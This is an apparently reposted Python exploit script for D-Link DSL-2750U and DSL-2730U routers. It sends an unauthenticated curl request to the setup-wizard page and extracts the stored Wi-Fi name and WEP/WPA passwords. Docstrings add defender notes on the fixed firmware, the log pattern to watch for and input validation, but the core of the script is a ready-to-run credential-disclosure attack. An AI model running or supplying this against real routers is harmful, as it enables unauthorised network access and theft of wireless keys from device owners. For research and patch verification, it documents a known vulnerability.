




Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070098

Below is a copy:

D-Link DSL-2750U Wifi Password Disclosure
#!/usr/bin/env python
# -*- coding: utf-8 -*- 

import os
import subprocess

def banner():
    """Clear the terminal and print the advisory header for this script.

    The header is a single unicode literal: title, author and CVE
    identifiers, the firmware builds the author reports testing, and the
    build the author lists as fixed. It is display text only; nothing in
    it is parsed or used by the rest of the script.
    """
    # Shells out to the `clear` utility; the command string is fixed.
    os.system("clear")
    # \u001b[...m sequences are ANSI colour codes; \u001b[0m resets the terminal.
    print u"""\u001b[33;1m
                             
                     
                            
                                
                          
                           
    \u001b[32;1m      # Exploit Title: Setup Wizard Page Authentication Bypass {Wifi Password Disclosure}        
    \u001b[32;1m      # Exploit Author: Admin_JOKER(CVE-2019-1010155)(CVE-2019-1010156)
    \u001b[32;1m      # Exploit Work on GNU/Linux
    \u001b[37;1m      # Email: [email protected]
    \u001b[37;1m      # Date: 2018-08-23        
    \u001b[37;1m      # Category: Webapps
    \u001b[37;1m      # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/
    \u001b[31;1m      # Tested on: DSL-2750U / ME_1.03 ME_1.07 ME_1.09 ME_1.11 & IN_1.15
    \u001b[31;1m      # Tested on: DSL-2730U / ME_1.07
    \u001b[31;1m      # Firmware Version:  IN_1.15 and  All Older Firmware(1.0 Not work) (Fix in ME_1.15)
    \u001b[31;1m      # Video : https://youtu.be/iISdfFlghu8              
    \u001b[33;1m                                                       \u001b[0m
    """

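def exploit():
    """Ask for a router address and print the Wi-Fi settings its wizard page returns.

    The request below carries no credentials or session cookie. It fetches
    the setup-wizard wireless sub-page and keeps only the lines that define
    ``wireless_name`` and the ``randomW...`` key variables, relabelled as
    Wifi Name / WEP Password / WPA Password. Any output therefore means the
    device serves its wireless keys to unauthenticated clients.

    Defender notes:
      * The script header lists ME_1.15 as the fixed firmware; devices on the
        builds it names as tested should be upgraded, and the Wi-Fi
        passphrase rotated afterwards since it may already have been read.
      * Where web-management logs exist, requests to ``/cgi-bin/webproc``
        with ``var:subpage=wizwl`` that are not preceded by a login are the
        pattern to look for.
      * Keep the management interface reachable only from trusted hosts.

    Returns:
        None. Results are written to the terminal by the shell pipeline.
    """
    print(u"\u001b[31;1m(Default: 192.168.1.1:80)\u001b[0m")
    target = raw_input(u'\u001b[33;1mType Router [IP:PORT]: \u001b[0m').strip()
    if target == '':
        target = '192.168.1.1:80'

    # `target` is spliced into a shell command line below. Without this
    # allow-list a quote or `;` in the typed/pasted value would run arbitrary
    # commands on the machine running the script. Only characters valid in
    # HOST:PORT are accepted.
    allowed = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-:")
    if not all(ch in allowed for ch in target):
        print (u"\u001b[31;1mInvalid target: expected IP:PORT or HOST:PORT\u001b[0m")
        return

    print (u'\u001b[32;1m')
    print (""),
    # curl fetches the wizard page; grep keeps the SSID/key variable lines;
    # sed swaps the JavaScript variable names for readable labels.
    os.system("curl -s 'http://"+target+"/cgi-bin/webproc?getpage=html/index.html&errorpage=html/index.html&var:language=en_us&var:menu=setup&var:subpage=wizwl&var:page=wizard' | grep -e 'var wireless_name' -e 'var randomW' | sed -e 's/var wireless_name/Wifi Name/' -e 's/var randomWEPKey/WEP Password/' -e 's/var randomWPAKEY/WPA Password/' -e 's/;//'")
    print (u'\u001b[0m')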

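# Show the header once, then run the interactive check. The original called
# banner() twice in a row; the second call only cleared the screen and redrew
# the same text, so the visible result is unchanged.
banner()
exploit()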
